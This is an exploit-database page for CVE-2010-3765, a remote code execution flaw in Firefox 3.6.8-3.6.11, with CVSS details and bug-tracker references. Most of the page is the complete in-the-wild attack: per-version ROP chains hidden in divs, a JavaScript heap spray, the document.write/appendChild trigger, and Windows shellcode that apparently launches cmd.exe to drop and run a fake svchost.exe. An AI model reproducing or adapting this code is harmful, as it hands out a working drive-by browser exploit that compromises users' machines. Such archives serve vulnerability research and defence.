Firefox 3.6.8 - 3.6.11 Interleaving document.write and appendChild Exploit (From the Wild)

2010.11.03

Credit: unknown

Risk: High

Local: No

Remote: Yes

CVE: CVE-2010-3765

CWE: CWE-noinfo

CVSS Base Score: 9.3/10

Impact Subscore: 10/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: Complete

Integrity impact: Complete

Availability impact: Complete

<!--
WARNING! This is exploit code from the wild. The original first 2 unicode chars at 'id=sun8' were ub8acu1029. Use, as always, at your own risk.
<body>
<div style="visibility:hidden;width:0px;height:0px">
<div id=sun8>uccccuccccu0d00u0d0du0d00u102du1000u0d00u102du1000u102du1000u2853u1000u0011u0000u116cu1000u0300u7ffeub459u1002u6b99u1000ub333udeaduffffuffffu57a8u13e8u0000u0000u57a0u13e8u1000u0000u0040u0000u2853u1000u0001u0000u2853u1000u0000u0000u1af1u1000u9090u0febu7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000u5b58u1889u7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000ufb83u74ffu7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000u830bu04c0u7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000uf3ebue890u7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000uffecuffffu7be4u1005u1af1u1000u57a8u13e8u116cu1000u57a8u13e8ub459u1002</div>
<div id=sun9>uef52u100auef52u100auef52u100auef52u100auef52u100auef52u100auef51u100au0011u0000u5500u1001u0300u7FFEud761u1004uff9cu1007uB333uDEADuFFFFuFFFFu57A8u0d78u0000u0000u57A0u0d78u1000u0000u0040u0000uef51u100au0001u0000uef51u100au0000u0000uce22u1003u9090u0FEBu9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003u5B58u1889u9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003uFB83u74FFu9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003u830Bu04C0u9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003uF3EBuE890u9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003uFFECuFFFFu9602u1001uce22u1003u57A8u0d78u5500u1001u57A8u0d78ud761u1004</div>
<div id=sun10>uB8B7u1029uB8B7u1029uB8B7u1029uB8B7u1029uB8B7u1029uB8B7u1029u20F0u1011u0011u0000u1FC7u1052u0300u7FFEuFD6Du1001uA173u1007uB333uDEADuFFFFuFFFFu57A8u0d78u0000u0000u57A0u0d78u1000u0000u0040u0000u20F0u1011u0001u0000u20F0u1011u0000u0000u9405u1003u9090u0FEBuE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003u5B58u1889uE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003uFB83u74FFuE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003u830Bu04C0uE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003uF3EBuE890uE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003uFFECuFFFFuE541u1001u9405u1003u57A8u0d78u1FC7u1052u57A8u0d78uFD6Du1001</div>
<div id=sun11>u4bc8u1000u4bc8u1000u4bc8u1000u4bc8u1000u4bc8u1000u4bc8u1000u4bc7u1000u0011u0000u827fu1000u0300u7FFEucda3u1000u6689u1000uB333uDEADuFFFFuFFFFu57A8u0d78u0000u0000u57A0u0d78u1000u0000u0040u0000u4bc7u1000u0001u0000u4bc7u1000u0000u0000u11a1u1000u9090u0FEBu3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000u5B58u1889u3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000uFB83u74FFu3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000u830Bu04C0u3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000uF3EBuE890u3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000uFFECuFFFFu3500u1007u11a1u1000u57A8u0d78u827fu1000u57A8u0d78ucda3u1000</div>
<div id=suv>uEC81u0120u0000uFC8BuC783uC704u3207u9174uC70Cu0447u138EuAC0Au47C7u3908u7DE2uC783u0C47u65A0uCB97u47C7u9310uE432uC794u1447uD550uCB9Bu47C7u4318uACBEuC7DBu1C47u36B2u130Fu47C7uC420u1F8DuC774u2447u2F51u01A2u47C7u5728u0D66uC7FFu2C47u879BuE58Bu47C7uED30uFFAFuC7B4u3447u19C2u014Bu47C7u7D38uA5F0uC79Au3C47u2BE4uC594u47C7uEC40u5F9DuC7A4u4447uD680u9AAFu8DE9u0000u3300u64C0u30A1u0000u8B00u0C40u408Bu8B14u8B00u8B00u1040uE88BuF78Bu116AuE859u0027u0000uF9E2u6DEBu8B5Bu6AEEu5300u55FFu6424u00A1u0000uC700u0440u0000u0000u00C7u0000u0000u00B8u0000uFF00u51E0u8B56u3C75u748Bu782EuF503u8B56u2076uF503uC933u4149u03ADu33C5u0FDBu10BEuD63Au0874uCBC1u0307u40DAuF1EBu1F3BuE775u8B5Eu245EuDD03u8B66u4B0Cu5E8Bu031Cu8BDDu8B04uC503u5EABuC359u6EE8uFFFFuE8FFuFF8EuFFFFu6D63u2E64u7865u2065u632Fu4620u524Fu2F20u2052u2522u5355u5245u5250u464Fu4C49u2545u4C5Cu636Fu6C61u5320u7465u6974u676Eu5C73u7041u6C70u6369u7461u6F69u206Eu6144u6174u4D5Cu7A6Fu6C69u616Cu465Cu7269u6665u786Fu505Cu6F72u6966u656Cu5C73u2022u6925u4920u204Eu2A28u2029u4F44u6920u2066u7E25u697Au6520u7571u2020u3834u3436u2030u6320u646Du652Eu6578u2F20u2063u6F63u7970u2220u6925u2022u2220u7425u6D65u2570u735Cu7663u6F68u7473u652Eu6578u2022u792Fu2620u2220u7425u6D65u2570u735Cu7663u6F68u7473u652Eu6578u0022uffffuffffuffffuffff</div>
</div>
<body>
<script src=scvhost.txt></script>
<script type="text/javascript">
function check(){
var temp="";
var user=navigator.userAgent.toLowerCase();
var a=user.indexOf("windows nt 6.1");
var b=user.indexOf("windows nt 6.0");
var c=user.indexOf("firefox/3.6.8");
var d=user.indexOf("firefox/3.6.9");
var e=user.indexOf("firefox/3.6.10");
var f=user.indexOf("firefox/3.6.11");
if(a==-1&&b==-1&&c!=-1&&d==-1&&e==-1&&f==-1){
temp="8";
}
else if(a==-1&&b==-1&&c==-1&&d!=-1&&e==-1&&f==-1){
temp="9";
}
else if(a==-1&&b==-1&&c==-1&&d==-1&&e!=-1&&f==-1){
temp="10";
}
else if(a==-1&&b==-1&&c==-1&&d==-1&&e==-1&&f!=-1){
temp="11";
}
else {
return temp="0";
}
return temp;
}
function de(su){
var i;var sun = "";
for (i = 0; i < su.length; i++){
sun += String.fromCharCode(parseInt(su[i], 16));
}
return unescape(sun);
}
function code(beastk){
var nop = "";
var len = beastk.length;
for (i = 0; i < len;) {
nop = nop + "m" + beastk.substring(i, i + 5);
i = i + 5;
}
nop = nop.split("m").toString();
var temp = new Array();
for (j = 0; j < nop.length; j++) {
if (nop.charCodeAt(j).toString(16) == "2c") {
temp.push("25");
}
else {
temp.push(nop.charCodeAt(j).toString(16));
}
}
return de(temp);
}
function getatts(str){
var cobj=document.createElement(str);
cobj.id="testcase";
document.body.appendChild(cobj);
var obj=document.getElementById("testcase");
var atts = new Array();
for(p in obj){
if(typeof(obj[p])=="string"){
atts.push(p);
}
}
document.body.removeChild(cobj);
return atts;
}
var ck=check();
var bk="mp.ojsyex5";
var array = new Array();
var ls = 0x100000-(bk.length*2+0x01020);
var b1 ="";//////////////////////111111111111111111111111111111
if (ck == "0") {
location.href = "about:blank";
}
else {
if(ck=="8"){
b1=code("u0d0du0d0d");
}
if(ck=="9"){
b1=code("uef52u100a");
}
if(ck=="10"){
b1=code("ub8b7u1029");
}
if(ck=="11"){
b1=code("u4bc8u1000");
}
var b = b1;
while (b.length < (0x85750 - 0x1000) / 2) {
b += b1
};
///////////////////////////////2222222222222222222
var sun="";
var sun8 = document.getElementById("sun8").innerHTML;
var sun9 = document.getElementById("sun9").innerHTML;
var sun10 = document.getElementById("sun10").innerHTML;
var sun11 = document.getElementById("sun11").innerHTML;
var suv = document.getElementById("suv").innerHTML;
if(ck=="8"){
sun=sun8;
}
if(ck=="9"){
sun=sun9;
}
if(ck=="10"){
sun=sun10;
}
if(ck=="11"){
sun=sun11;
}
b += code(sun + suv);
for (u = 0; u < 8; u++) {
b1 += b1;
}
while (b.length < ls) {
b += b1;
}
var lh = b.substring(0, ls / 2);
b = "";
for (i = 0; i < 0x200; i++) {
array[i] = lh + bk;
}
////////////////////////////////////333333333333
if(ck=="8"){
b1=code("ub8a7u1029");
}
if(ck=="9"){
b1=code("uab07u1006");
}
if(ck=="10"){
b1=code("u8247u1009");
}
if(ck=="11"){
b1=code("uf7e7u1017");
}
for (i = 0; i < 16; i++) {
b1 += b1;
}
b = b1;
while (b.length < ls) {
b += b1;
}
lh = b.substring(0, ls / 2);
b = "";
for (i = 0x200; i < 0x500; i++) {
array[i] = lh + bk;
}
var tags = new Array("audio", "a", "base");
for (inx = 0; inx < 0x8964; inx++)
for (i = 0; i < tags.length; i++) {
var atts = getatts(tags[i]);
for (j = 0; j < atts.length; j++) {
var html = "<" + tags[i] + " " + atts[j] + "=a></" + tags[i] + ">" + tags[i];
document.write(html);
}
}
}
</script>-->

References:

https://bugzilla.redhat.com/show_bug.cgi?id=646997

https://bugzilla.mozilla.org/show_bug.cgi?id=607222#c53

https://bugzilla.mozilla.org/show_bug.cgi?id=607222

http://www.norman.com/security_center/virus_description_archive/129146/

http://www.norman.com/about_norman/press_center/news_archive/2010/129223/

http://isc.sans.edu/diary.html?storyid=9817

http://blog.mozilla.com/security/2010/10/26/critical-vulnerability-in-firefox-3-5-and-firefox-3-6/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Firefox 3.6.8 - 3.6.11 Interleaving document.write and appendChild Exploit (From the Wild)

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.